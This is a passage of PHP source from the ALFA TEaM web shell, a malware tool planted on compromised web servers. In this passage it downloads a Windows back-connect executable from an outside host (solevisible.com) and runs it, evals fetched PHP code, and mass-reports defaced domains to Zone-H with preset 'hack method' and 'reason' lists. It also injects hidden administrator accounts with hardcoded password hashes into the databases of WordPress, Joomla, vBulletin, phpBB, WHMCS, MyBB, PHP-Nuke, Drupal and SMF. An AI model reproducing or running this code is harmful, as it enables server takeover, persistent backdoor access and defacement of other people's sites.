4253$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
4254$out = alfaEx("$lang $name $arg $os");
4255if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
4256echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
4257}
4258}else{
4259echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
4260}
4261}
4262if($lang=='java'||$lang=='c'){
4263$code = __get_resource($lan);
4264$out = nl2br(bcinit($lang, $code,'',''));
4265echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
4266}
4267if($lang=='bcwin'){
4268$alfa = new AlfaCURL();
4269$s = $alfa->Send('http://solevisible.com/bc/windows.exe');
4270$tmpdir = ALFA_TEMPDIR;
4271$f = @fopen($tmpdir.'/bcwin.exe','w+');
4272@fwrite($f, $s);
4273@fclose($f);
4274$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
4275}
4276if($lang=='php'){
4277echo "<pre class=ml1 style='margin-top:5px'>";
4278$code = __get_resource($lan);
4279if($code!==false){
4280$code = "\$target = \"".$arg."\";\n".$code;
4281eval($code);
4282echo("<center><font color='green'>[ Finished...! ]</font></center>");
4283}
4284echo "</pre>";
4285}
4286}
4287echo "</div>";
4288alfafooter();
4289}
4290function alfazoneh(){
4291alfahead();
4292echo '<div class=header>';
4293if(!function_exists('curl_version')){
4294echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
4295}
4296$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
4297$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
4298echo '
4299<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
4300<form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
4301<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
4302<br>
4303<select id="text" name="hackmode" style="width:400px;">';
4304$x=1;
4305foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
4306echo '</select><br><select id="text" name="reason" style="width:200px;">';
4307$x=1;
4308foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
4309echo '</select><br>
4310<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
4311<p><input type="submit" value=" " name="go" /></p>
4312</form></center>';
4313if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
4314ob_start();
4315$hacker = $_POST['alfa1'];
4316$method = $_POST['alfa2'];
4317$neden = $_POST['alfa3'];
4318$site = $_POST['alfa4'];
4319if(empty($hacker)){
4320die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
4321}elseif($method == "------------------------------------SELECT-------------------------------------"){
4322die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
4323}elseif($neden == "------------------------------------SELECT-------------------------------------"){
4324die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
4325}elseif(empty($site)){
4326die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
4327}
4328$i = 0;
4329$sites = explode("\n", $site);
4330$alfa = new AlfaCURL();
4331while($i < count($sites)){
4332if(substr($sites[$i], 0, 4) != "http"){
4333$sites[$i] = "http://".$sites[$i];
4334}
4335$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
4336++$i;
4337}
4338echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
4339}
4340echo "</div>";
4341alfafooter();
4342}
4343function alfapwchanger(){
4344alfahead();
4345
4346echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
4347<center><h3>';
4348$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
4349Alfa_Create_A_Tag('pwchanger',$vals);
4350echo '</h3></center>';
4351if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
4352
4353echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
4354<p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
4355$table = array('td1' =>
4356 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4357 'td2' =>
4358 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4359 'td3' =>
4360 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4361 'td4' =>
4362 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4363 'td5' =>
4364 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
4365 'td6' =>
4366 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4367 'td7' =>
4368 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4369 'td8' =>
4370 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4371);
4372create_table($table);
4373echo '<p><input value=" " name="send" type="submit"></p></form>';
4374if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
4375$localhost = $_POST['alfa3'];
4376$database = $_POST['alfa4'];
4377$username = $_POST['alfa5'];
4378$password = $_POST['alfa6'];
4379$admin = $_POST['alfa8'];
4380$SQL = $_POST['alfa9'];
4381$prefix = $_POST['alfa10'];
4382$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4383$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
4384$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
4385$sole = @mysqli_num_rows($solevisible);
4386if ($sole == 1){
4387$solevis = @mysqli_fetch_assoc($solevisible);
4388$res = $solevis['ID'];
4389}
4390$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
4391if($solevisible){
4392__alert('Success... '.$admin.' is created...');}
4393}
4394}
4395if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
4396
4397echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
4398$table = array('td1' =>
4399 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4400 'td2' =>
4401 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4402 'td3' =>
4403 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4404 'td4' =>
4405 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4406 'td5' =>
4407 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
4408 'td6' =>
4409 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4410 'td7' =>
4411 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4412 'td8' =>
4413 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4414);
4415create_table($table);
4416echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4417if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4418$localhost = $_POST['alfa3'];
4419$database = $_POST['alfa4'];
4420$username = $_POST['alfa5'];
4421$password = $_POST['alfa6'];
4422$admin = $_POST['alfa8'];
4423$SQL = $_POST['alfa9'];
4424$prefix = $_POST['alfa10'];
4425$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4426$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
4427$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
4428$sole =@mysqli_num_rows($solevisible);
4429if ($sole == 1){
4430$solevis =@mysqli_fetch_assoc($solevisible);
4431$res = $solevis['id'];
4432}
4433$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
4434if($solevisible){
4435__alert('Success... '.$admin.' is created...');}
4436}
4437}
4438if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
4439
4440echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
4441$table = array('td1' =>
4442 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4443 'td2' =>
4444 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4445 'td3' =>
4446 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4447 'td4' =>
4448 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4449 'td5' =>
4450 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4451 'td6' =>
4452 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4453 'td7' =>
4454 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4455 'td8' =>
4456 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4457);
4458create_table($table);
4459echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4460if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4461$localhost = $_POST['alfa2'];
4462$database = $_POST['alfa3'];
4463$username = $_POST['alfa5'];
4464$password = $_POST['alfa6'];
4465$prefix = $_POST['alfa7'];
4466$admin = $_POST['alfa8'];
4467$SQL = $_POST['alfa9'];
4468$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4469$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
4470$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
4471$sole = mysqli_num_rows($solevisible);
4472if($sole == 1){
4473$solevis = mysqli_fetch_assoc($solevisible);
4474$res = $solevis['userid'];
4475}
4476$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
4477if($solevisible){
4478__alert('Success... '.$admin.' is created...');}
4479}
4480}
4481if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
4482
4483echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4484$table = array('td1' =>
4485 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4486 'td2' =>
4487 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4488 'td3' =>
4489 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4490 'td4' =>
4491 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4492 'td5' =>
4493 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4494 'td6' =>
4495 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4496 'td7' =>
4497 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4498 'td8' =>
4499 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4500);
4501create_table($table);
4502echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4503if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4504$localhost = $_POST['alfa2'];
4505$database = $_POST['alfa3'];
4506$username = $_POST['alfa4'];
4507$password = $_POST['alfa6'];
4508$admin = $_POST['alfa8'];
4509$SQL = $_POST['alfa9'];
4510$prefix = $_POST['alfa10'];
4511$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4512$hash = md5('solevisible');
4513$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4514$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4515$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
4516$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
4517$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4518if($solevisible){
4519__alert('Success... '.$admin.' is created...');
4520}
4521}
4522}
4523if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
4524
4525echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
4526$table = array('td1' =>
4527 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4528 'td2' =>
4529 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4530 'td3' =>
4531 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4532 'td4' =>
4533 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4534 'td6' =>
4535 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4536 'td7' =>
4537 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4538 'td8' =>
4539 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4540);
4541create_table($table);
4542echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4543if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4544$localhost = $_POST['alfa2'];
4545$database = $_POST['alfa3'];
4546$username = $_POST['alfa4'];
4547$password = $_POST['alfa5'];
4548$admin = $_POST['alfa8'];
4549$SQL = $_POST['alfa9'];
4550$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4551$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
4552if($solevisible){
4553__alert('Success... '.$admin.' is created...');}
4554}
4555}
4556if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
4557
4558echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4559$table = array('td1' =>
4560 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4561 'td2' =>
4562 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4563 'td3' =>
4564 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4565 'td4' =>
4566 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4567 'td5' =>
4568 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4569 'td6' =>
4570 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4571 'td7' =>
4572 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4573 'td8' =>
4574 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4575);
4576create_table($table);
4577echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4578if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4579$localhost = $_POST['alfa2'];
4580$database = $_POST['alfa3'];
4581$username = $_POST['alfa4'];
4582$password = $_POST['alfa5'];
4583$admin = $_POST['alfa8'];
4584$SQL = $_POST['alfa9'];
4585$prefix = $_POST['alfa10'];
4586$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4587$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
4588if($solevisible){
4589__alert('Success... '.$admin.' is created...');}
4590}
4591}
4592if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
4593
4594echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
4595$table = array('td1' =>
4596 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4597 'td2' =>
4598 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4599 'td3' =>
4600 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4601 'td4' =>
4602 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4603 'td5' =>
4604 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4605 'td6' =>
4606 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4607 'td7' =>
4608 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4609 'td8' =>
4610 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4611);
4612create_table($table);
4613echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4614if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4615$localhost = $_POST['alfa2'];
4616$database = $_POST['alfa3'];
4617$username = $_POST['alfa4'];
4618$password = $_POST['alfa5'];
4619$admin = $_POST['alfa7'];
4620$SQL = $_POST['alfa9'];
4621$prefix = $_POST['alfa10'];
4622$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4623$hash = md5($pwd);
4624$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
4625if($solevisible){
4626__alert('Success... '.$admin.' is created...');}
4627}
4628}
4629if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
4630
4631echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
4632$table = array('td1' =>
4633 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4634 'td2' =>
4635 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4636 'td3' =>
4637 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4638 'td4' =>
4639 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4640 'td6' =>
4641 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4642 'td7' =>
4643 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
4644 );
4645create_table($table);
4646echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4647if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4648$localhost = $_POST['alfa2'];
4649$database = $_POST['alfa4'];
4650$username = $_POST['alfa5'];
4651$password = $_POST['alfa6'];
4652$admin = $_POST['alfa8'];
4653$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4654$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
4655$getDescuid = @mysqli_fetch_assoc($getDescuid);
4656$getDescuid = $getDescuid['uid'];
4657$getdescuid = $getDescuid++;
4658$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
4659$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
4660$sole = mysqli_num_rows($solevisible);
4661if ($sole == 1){
4662$solevis = mysqli_fetch_assoc($solevisible);
4663$res = $solevis['uid'];
4664}
4665$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
4666if($solevisible){
4667__alert('Success... '.$admin.' is created...');}
4668}
4669}
4670
4671if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
4672
4673echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
4674$table = array('td1' =>
4675 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4676 'td2' =>
4677 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4678 'td3' =>
4679 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4680 'td4' =>
4681 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4682 'td5' =>
4683 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
4684 'td6' =>
4685 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4686 'td7' =>
